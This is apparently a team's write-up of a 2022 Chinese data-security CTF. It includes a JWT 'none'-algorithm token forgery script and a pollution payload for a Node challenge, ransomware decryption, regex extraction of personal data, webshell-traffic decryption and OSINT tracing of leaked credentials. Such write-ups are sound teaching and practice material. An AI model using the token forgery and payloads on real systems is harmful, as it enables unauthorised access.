2022数据安全wp
参赛战队队名:青春猪头thai会梦见无敌暴龙美少女战士/T249305
战队排名:98 (最终77)
战队整体答题情况:攻克题目数48
数据安全赛道
问卷调查
写问卷,最后有flag
easy_node
做题人:清纯柱头台
按照题目的思路,应该是先登录成为admin之后可以使用copyarray,copyarrary凭直觉,出现了递归是可以有洞的,问题是登录
结果调试,发现这个
const token = jwt.sign({username}, secret, {algorithm: 'HS256'});
algorithm本来应该是algorithms,这里存在误用,导致这个算法没有真正存进去
所以伪造cookie,把算法置为空,脚本网上找的
const jwt = require('jsonwebtoken');
var payload = {
username: 'admin'
}
var token = jwt.sign(payload, undefined, {algorithm: 'none'});
console.log(token);
之后这个比较常规
{"properties":[{"0":"flag","length":1}]}
勒索文件恢复
做题人:清纯柱头台
from Crypto.Util.number import getPrime,bytes_to_long,long_to_bytes
import base64
from Crypto.PublicKey import RSA
from Crypto.Cipher import PKCS1_v1_5,AES
from Crypto.Util.Padding import unpad
from gmpy2 import invert
p=272996653310673477252411125948039410213
q=272996653310673477252411125948039410333
encrypted_aes_key=base64.b64decode('hNjALvjhXUT4Uk6pMmC30o4hhhFDhtbPQzhYzUl+bsWjDHer2fvCTQKGJ2hmEb4TDWx2s0huNPCSO46vo2BVUw==')
encrypted_private_key=base64.b64decode('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')
n=p*q
e=65537
d=invert(e,(p-1)*(q-1))
prikey_pkcs=''
for i in range(0,len(encrypted_private_key),32):
c=bytes_to_long(encrypted_private_key[i:i+32])
m=pow(c,d,n)
plain_ =long_to_bytes(m)
for i in range(len(plain_)-1,0,-1):
if plain_[i] == 0:
prikey_pkcs+=plain_[i+1:].decode()
print(prikey_pkcs)
private_key=RSA.import_key(prikey_pkcs)
uid_d=private_key.d
uid_n=private_key.n
aes_key=b''
for i in range(0,len(encrypted_aes_key),16):
c=bytes_to_long(encrypted_aes_key[i:i+16])
m=pow(c,uid_d,uid_n)
plain_=long_to_bytes(m)
for i in range(len(plain_)-1,0,-1):
if plain_[i]==0:
aes_key+=plain_[i+1:]
cipher=AES.new(aes_key,AES.MODE_CBC,aes_key)
f=open("flag.mp3.locked",'rb')
cccc=f.read()
res=cipher.decrypt(cccc)
fo=open("flag.mp3","wb")
fo.write(res)
fo.close()
最后是一个音频文件,听flag
数据算法题
做题人:清纯柱头台
先根据文件的要求把所有可能的情况匹配一下
import re
######## luhn 算法 ############
def luhn_checksum(card_number):
def digits_of(n):
return [int(d) for d in str(n)]
digits = digits_of(card_number)
odd_digits = digits[-1::-2]
even_digits = digits[-2::-2]
checksum = 0
checksum += sum(odd_digits)
for d in even_digits:
d_0 = 2*d
d_1 = d_0 // 10
d_2 = d_0 % 10
checksum += d_1
checksum += d_2
return checksum % 10
######### 匹配函数 ###############
def f(head,tail,text):
ans = []
reses = re.findall("("+head + tail+")", text)
for res in reses:
ans.append(res[0])
return ans
ff = open("result.txt", "a")
ff.write("Now the file has more content!\n")
#### phone ####
texts = open('./sens_data.txt', 'r').readlines()
heads = open('./phone_head.txt', 'r').readlines()
tail = "([\\-|\s])(\d)(\d)(\d)(\d)([\\-]|[\s])(\d)(\d)(\d)(\d)"
for ii in range(len(texts)):
text = texts[ii]
for head in heads:
ans = f("\s" + head.strip(), tail, text)
for i in ans:
print(ii + 1, "PhoneNo", i[1:])
ff.write(str(ii + 1) + ",PhoneNo," + str(i[1:]))
ff.write("\n")
######### IMEI #####
texts = open('./sens_data.txt', 'r').readlines()
heads = open('./IMEI_head.txt', 'r').readlines()
tail = "(\d)(\d)(\d)(\d)(\d)(\d)(\d)(\d)(\d)(\d)(\d)(\d)(\d)"
for ii in range(len(texts)):
text = texts[ii]
for head in heads:
ans = f("\s" + head.strip(), tail, text)
for i in ans:
if luhn_checksum(i[1:-1]) == int(i[-1]):
print(ii + 1, "IMEI", i[1:])
ff.write(str(ii + 1) + ",IMEI," + str(i[1:]))
ff.write("\n")
##### bankcard #####
texts = open('./sens_data.txt', 'r').readlines()
heads = open('./bankcard_head.txt', 'r').readlines()
tail = "(\d{10,16})"
for ii in range(len(texts)):
text = texts[ii]
for head in heads:
ans = f("\s" + head.strip(), tail, text)
for i in ans:
# if luhn_checksum(i[1:-1]) == int(i[-1]):
# print(i[1:])
print(ii + 1, "BankCard", i[1:])
ff.write(str(ii + 1) + ",BankCard," + str(i[1:]))
ff.write("\n")
#### ipv4 ####
head = "(25[0-5]|2[0-4]\d|[0-1]\d{2}|[1-9]?\d)\.(25[0-5]|2[0-4]\d|[0-1]\d{2}|[1-9]?\d)\.(25[0-5]|2[0-4]\d|[0-1]\d{2}|[1-9]?\d)\.(25[0-5]|2[0-4]\d|[0-1]\d{2}|[1-9]?\d)"
texts = open('./sens_data.txt', 'r').readlines()
for ii in range(len(texts)):
text = texts[ii]
ans = f(head, '', text)
for i in ans:
print(ii + 1, "IPv4", i[0:])
ff.write(str(ii + 1) + ",IPv4," + str(i[0:]))
ff.write("\n")
######## Email ####
head = "\w[-\w.+]*@([A-Za-z0-9][-A-Za-z0-9]+\.)+[A-Za-z]{2,14}"
text = open('./sens_data.txt', 'r').readlines()
for ii in range(len(texts)):
text = texts[ii]
ans = f(head, '', text)
for i in ans:
print(ii + 1, "Email", i[0:])
ff.write(str(ii + 1) + ",Email," + str(i[0:]))
ff.write("\n")
ff.close()
exit()
当然也可以单独运行然后把内容拼接在一起,再改下格式,把末尾换行什么的去掉
这样交上去只有590+
然后发现bankcard有一些格式没有匹配到
写脚本把剩余的bankcard匹配一下
import re
def luhn_checksum(card_number):
def digits_of(n):
return [int(d) for d in str(n)]
digits = digits_of(card_number)
odd_digits = digits[-1::-2]
even_digits = digits[-2::-2]
checksum = 0
checksum += sum(odd_digits)
for d in even_digits:
d_0 = 2*d
d_1 = d_0 // 10
d_2 = d_0 % 10
checksum += d_1
checksum += d_2
return checksum % 10
def f(text):
ans = []
patten = "[Bb]ank[Nn]o.*(\d{4}[- ]\d{4}[- ]\d{4}[- ]\d{1,6})" #每种patten都跑一遍
patten = "cardNo.*(\d{4}[- ]\d{4}[- ]\d{4}[- ]\d{1,6})"
patten = "[Cc]ard&.*(\d{4}[- ]\d{4}[- ]\d{4}[- ]\d{1,6})"
reses = re.findall(patten, text)
# print(reses)
for res in reses:
ans.append(res)
return ans
ff = open("bank.txt", "a")
texts = open('./sens_data.txt', 'r').readlines()
for ii in range(len(texts)):
text = texts[ii]
ans = f(text)
# print(ans)
for i in ans:
print(ii+1)
# print("cheching : "+ i)
#if luhn_checksum(i[1:-1]) == int(i[-1]):
print(i[1:])
print(ii + 1,"BankCard", i[1:])
ff.write(str(ii + 1) + ",BankCard," + str(i[0:]))
ff.write("\n")
再把跑出来结果追加到刚刚的result.txt上去就有648分
数据分析题
泄露溯源定位
做题人:刘积良
1
使用wireshark打开流量包,使用mysql过滤出mysql的数据包,然后
可以看到第三个登录用户为dataUser3
2
查看用户dataUser3的访问数据未果
根据文档提示:
该公司在github和语雀中曾经上传过部分代码,怀疑帐号在此泄漏。
前往语雀注册个账号,在个人空间的搜索处搜索dataUser3
复制其中的代码,在github搜索
进入后复制链接
https://github.com/Tristan-Hao/Green-Berry/blob/f766064e4f9c38bf4aefa06fd3d4abbda7fe4914/catalogue.py
将f766064e4f9c38bf4aefa06fd3d4abbda7fe4914
改为main
提交即可
3
根据dataUser3的访问语句,确定其得到的数据
dataUser1
张强 18798766766广州
王小明 13345678879北京市昌平区
13573839493 15877886543 13098887678 18798766766
地址:浙江省杭州市拜节新村97号
dataUser2
黄天 河北省石家庄
Roberto Qian Beijing
Liu Xiao 13098887678 北京市昌平区
收款人帐号:621700323000106****
dataUser3
王小明 13345678879 北京市昌平区
黄天 13573839493 河北省石家庄
Roberto Qian 15877886543 Beijing
Liu Xiao 13098887678 北京市昌平区
张强 18798766766 广州
以及dataUser3获得的
## select * from dcf_encryption_info
1 Base64
2 MD5
3 SHA1 go321
4 AES aa01
5 AES sin30
## select * from dcf_receive_info3
a....1.10021X
U2FsdGVkX18ONrEC8DOa5sxdTazAeWPXK8OP/885ZQJWJf6P4RsZUfl8o1VOczurimp/uoUa4NuWVb7f7yTcRw==
.....2.10024.
U2FsdGVkX18DnWH7nMCG3lVMd8GtLTXeuwEl7xgojnkN2Ovsm0rXzNqLEI0RSnwPYN+/p9BG4ODOr4Iwczj2A3nMwuZkzzTE8z88f/6gGzjhhbdA52JK3f1pivFbnSt+
u....3.10022l
U2FsdGVkX1+/NGJAqRBlFe+GyjneDvQ8ncbqP+ra5DXk1XGLuGXMbf7TLC5NSScurrJuB2mOxXHJh0yeNiW3vXC+/iKbXQoQhphVQJkUiX0=
u....4.11021l
U2FsdGVkX18X1/E8qwRNMB9ON1Z+fKLmmkhuVa0EoCRSnppuybeWlcho8XWURJhD0hS1TqBLLH/gAW3lqAGO5BTn9vjUCEQiY7ydcWGPBSs=
... .5.15021.
U2FsdGVkX19Gqh30S0qbTTKMw+mXBg2H+FsngqcZNr+KmWQnpVNLDtpPqt5eX7/hFEIbGXxOrJ9VUX3tBJZkR0RYL+TQHV6
QHoYvQweOFLRY/PcpP5D2NoqZMLT6hwrz
u...6.15021l
U2FsdGVkX1+bn0csCcNtspL662QhJQI/NEsj8fWWyIBU0GVXvvc/ygymTqH3x8LFcyvPV4YE7OtxkRXOS90Ox49TI/StAcIdnQBletRVA2g=
a....7.15021X
U2FsdGVkX1+2aHxIB+0HcAPn7x370Dv5RxN2LSlrmkqbNa8bpEfapNqyxWXFWtJvS3d6vfVNpgN6pFzpnDiELA==
a....8.11021X
U2FsdGVkX18Oj2t+msNrJ7T0sXpcrW0Usy1yqQYRoJF1JQwnD/thdJpPKZ1xTVtrgo8y6LQn5yMMzf6nR6vNiw==
a...9.15022X
U2FsdGVkX1+93npTkiALajdkWz5i4ccX2nV0mRQGfKQUcEOo0YpGBKSm21ayhT0wq7t7vypmpqqLemWjQN5z4Q==
b....10.16025X
U2FsdGVkX19uDaaDF/0X1yvPtZHqG1jG2Fw0bDQM+jqLoN19RE5MOdiQNVI0k150G+ZB3Ow+8pDvwIw9hdT8wQ==
b....11.15028X
U2FsdGVkX1/GrEF+qSfy8Fq+w8O0t7ABU1OqzrCoCFo+i42H03T9q2EjSKkSGSPh3gDfBHfamAJwf1OR0WprGw==
b....12.15026X
U2FsdGVkX19AUOJfLgsTjgV5N/ywPP0vvv52phIYEjxdX70aOG8ek8D55IPDYa7Bz05BmmFE89CVgMDIt1Y7zg==
J....13.15771@
U2FsdGVkX19V7mz6otuRIdXKP/0pG1DXBl7LwM8Ng28m0Om9wlGsBDUynwm4Hhfl
J....14.15231@
U2FsdGVkX19PJjvCZ4dPBUzWF0A0ZrRQf5C7bYAbC2DUBEggsjIWflpsUkgeFQOK
J....15.15451@
U2FsdGVkX18li8mlOIWPfxl331OPPIE64pywNqWvq88P0ZJSU7WMO2ZyDNxxD/on
J....16.15091@
U2FsdGVkX19yVfbektz9sPOmf64arS54qTNOQI4qH1A0AGNPMtw1kGaJ2zMx7MDl
SQLpacket
做题人:曹国航
导出对象,HTTP对象
可见有shell.php和写马的操作
可见传输加密手段
写出解密脚本(直接解密不知道为何会出现问题,所以有修正):
import base64
from Crypto.Cipher import AES
def decrypt(post):
key = b'05c1cc9c2deafb75'
post = base64.b64decode(post)
# post = list(post)
# for i, v in enumerate(post):
# post[i] = v ^ key[(i + 1) & 15]
# post = bytes(post)
# post
aes1 = AES.new(key, AES.MODE_CBC)
aes2 = AES.new(key, AES.MODE_ECB)
part1, part2 = aes1.decrypt(post), aes2.decrypt(post)
post = part2[:16] + part1[16:]
return post
decrypt('GBry5TfOces2H41Rjd+Gkmso9QPVLUsIsqV+CkcVIos/1/p2zZBgq6EuLkyMLZOF')
1
5
进行解码分析,发现主要是一些交互脚本,返回的是json结果
使用tshark提取
tshark -r sql.pcapng -e tcp.stream -e http.file_data -Tfields 'tcp.stream >= 190' > rst.txt
然后使用脚本解析:
import json
with open('rst.txt', 'r') as f:
data = f.read().splitlines()
with open('rrrst.txt', 'w') as f:
for d in data:
d = d.split()
if len(d) != 2:
continue
idx, post = d
try:
post = decrypt(post)
except:
continue
# startidx = post.find(b'base64_decode(\'') + 15
print(idx, post.decode(), file=f)
if b'msg' in post:
idx = post.find(b'}')
js = json.loads(post[:idx+1])
print(base64.b64decode(js['msg']).decode(), file=f)
# b = post[startidx:post.find(b'\'));')]
# print(b)
# s = base64.b64decode(b)
# print(s.decode())
从结果中可以找到信息:
mysql666123.c
2
其中在写逆脚本中发现tcp.stream eq 197有无法解析的内容,拷贝下来解析可知
得到secret1的值
账密泄露追踪
做题人:曹国航
1
GitHub 搜索 green berry 发现项目:https://github.com/Tristan-Hao/Green-Berry
查看commit,发现key:
答案:https://github.com/Tristan-Hao/Green-Berry/blob/main/scrubbers.py
2
Gitee 搜索 qingmei 发现项目:https://gitee.com/datasecurity-qunzhong/qing-mei-login
同理答案:https://gitee.com/datasecurity-qunzhong/qing-mei-login/blob/master/scrubbers.py
3
语雀搜索 青莓 后台,得到https://www.yuque.com/shuanxiaoming/gsx1eb/efnpu3
4
知乎搜索 青莓 后台,得到https://zhuanlan.zhihu.com/p/521587651
5
CSDN 搜索 青莓 后台,得到https://blog.csdn.net/haoxin1983/article/details/125905827
BlueTeam
做题人:曹国航
1
查看 Security 事件,发现有多个用户登录的痕迹
newguest
link3
ming
tony
Guest
Adminnistrator
NewGuest
strike
miao
然后发现 ming 这个账户似乎被多次爆破,登陆失败
尝试提交 Ming 成功
2
把log1.pcap中的所有ip和可能的端口尝试后,发现是192.168.13.1:3389
其中3389是windows远程桌面端口
3
先做的4,反过来回头溯源,发现 tior.exe 和 WINWORD.EXE 打开它的,提交错误
再次溯源,发现 WINWORD.EXE 第一次打开的文件是 helper.doc
尝试提交,成功
4
使用 Process Tree 打开,然后点开进程树,发现可疑进程名字,尝试成功
5
将可疑文件添加入 include,随后发现多份文件,其中有 身份证 相关信息:
尝试提交,成功